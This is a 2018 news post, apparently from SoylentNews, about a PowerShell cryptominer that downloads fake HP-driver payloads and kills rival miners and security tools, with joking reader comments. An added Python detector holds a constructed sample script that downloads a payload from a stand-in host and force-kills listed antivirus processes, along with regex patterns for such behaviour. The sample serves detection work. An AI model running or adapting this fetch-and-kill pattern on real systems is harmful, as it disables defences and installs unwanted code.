posted by Fnord666 on Wednesday March 07 2018, @06:27PM
from the miner-kerfluffle dept.

Cryptocurrency-mining malware-scum have started to write code that evicts rivals from compromised computers.

The miner in question was first noticed by SANS Internet Storm Center handler Xavier Mertens. Mertens spotted the PowerShell script on March 4, and noting that it kills any other CPU-greedy processes it spots on target machines, he wrote: “The fight for CPU cycles started!”

Pre-infection, the attack script checks whether a target machine is 32-bit or 64-bit and downloads files known to VirusTotal as hpdriver.exe or hpw64 (they're pretending to be HP drivers of some kind).

If successfully installed, the attack then lists running processes and kills any it doesn't like. Mertens noted that alongside ordinary Windows stuff, the list of death-marked processes includes many associated with cryptominers, some of which are listed below.

Mertens wrote that the script also checks for processes associated with security tools.
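
A defender-side heuristic for the behaviour described above, as an added example that is not from the article or from Mertens' write-up: it flags PowerShell script text (for instance, text captured by script block logging) that combines a download with a kill call and a list of several name literals. The regexes, the threshold, the function name and all three sample scripts are constructed assumptions, and the placeholder names are not the ones in the real script.

```python
import re

# Behavioural markers (assumed patterns, tune for your environment).
ARCH = re.compile(r"Is64BitOperatingSystem|\[IntPtr\]::Size|PROCESSOR_ARCHITECTURE|OSArchitecture", re.I)
DOWNLOAD = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I)
ENUMERATE = re.compile(r"Get-Process|Win32_Process|tasklist", re.I)
KILL = re.compile(r"Stop-Process|taskkill|\.Kill\(\)|\.Terminate\(\)", re.I)
# Short quoted tokens that could be process names; URLs and paths do not match.
NAME_LITERAL = re.compile(r"""["']([A-Za-z0-9_.\-]{3,40})["']""")


def analyze(script, min_targets=5):
    """Return the signals found in one script and an overall verdict."""
    names = {n.lower() for n in NAME_LITERAL.findall(script)}
    signals = {
        "arch_check": bool(ARCH.search(script)),
        "download": bool(DOWNLOAD.search(script)),
        "enumerates": bool(ENUMERATE.search(script)),
        "kills": bool(KILL.search(script)),
        "name_literals": len(names),
    }
    # One kill of one named process is routine administration; a kill call
    # next to a long name list is the "evict the rivals" pattern.
    bulk_kill = signals["kills"] and len(names) >= min_targets
    signals["suspicious"] = signals["download"] and bulk_kill
    return signals


# Constructed samples: placeholder names and a non-resolving host.
SAMPLE_EVICTOR = r'''
if ([Environment]::Is64BitOperatingSystem) { $f = "payload64" } else { $f = "payload32" }
(New-Object Net.WebClient).DownloadFile("http://example.invalid/$f", "$env:TEMP\$f")
$kill = @("placeholder-miner1","placeholder-miner2","placeholder-miner3","placeholder-av1","placeholder-av2")
Get-Process | Where-Object { $kill -contains $_.Name } | Stop-Process -Force
'''
SAMPLE_ADMIN = 'Get-Process -Name "notepad" | Stop-Process'
SAMPLE_INSTALLER = 'Invoke-WebRequest "https://example.invalid/setup.msi" -OutFile "setup.msi"'

if __name__ == "__main__":
    for label, text in [("evictor", SAMPLE_EVICTOR), ("admin", SAMPLE_ADMIN),
                        ("installer", SAMPLE_INSTALLER)]:
        print(label, analyze(text))
```

Counting name literals is deliberately crude: a script that builds its kill list at run time or from a downloaded file will not reach the threshold, so treat a hit as a triage signal and a miss as no evidence either way.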


  • (Score: 2) by frojack on Wednesday March 07 2018, @06:54PM (3 children)

    by frojack (1554) on Wednesday March 07 2018, @06:54PM (#649116) Journal

    Well, since it's PowerShell we know it's Windows.

    The fact that both snuck through Windows' sieve/defense and got installed in the first place, while interesting and instructive, is not central to the question.

    Instead I ask: should Windows users actually care if one malware manages to kill off another malware?
    That makes it easier to eradicate them all, does it not? Let them duke it out, then kill the winner.

    Of course, if the user didn't notice any of these things sneaking onto his machine in the first place he probably won't notice the battle or the winner.

    --
    No, you are mistaken. I've always had this sig.
  • (Score: 2) by bob_super on Wednesday March 07 2018, @07:06PM (2 children)

    by bob_super (1357) on Wednesday March 07 2018, @07:06PM (#649119)

    We just need to educate users on how to freeze their CPUs, to make sure all the gorilla miners die?

    • (Score: 2) by Freeman on Wednesday March 07 2018, @07:13PM (1 child)

      by Freeman (732) on Wednesday March 07 2018, @07:13PM (#649122) Journal

      I'm quite sure the average user knows how to place their computer in a freezer. Most of them may not have room in the freezer, though.

      --
      Joshua 1:9 "Be strong and of a good courage; be not afraid, neither be thou dismayed: for the Lord thy God is with thee"
      • (Score: 2) by bob_super on Wednesday March 07 2018, @07:17PM

        by bob_super (1357) on Wednesday March 07 2018, @07:17PM (#649123)

        Not with gorillas inside, obviously.